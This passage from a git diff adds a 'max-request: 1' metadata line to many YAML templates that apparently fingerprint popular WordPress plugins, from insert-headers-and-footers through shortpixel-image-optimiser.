+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
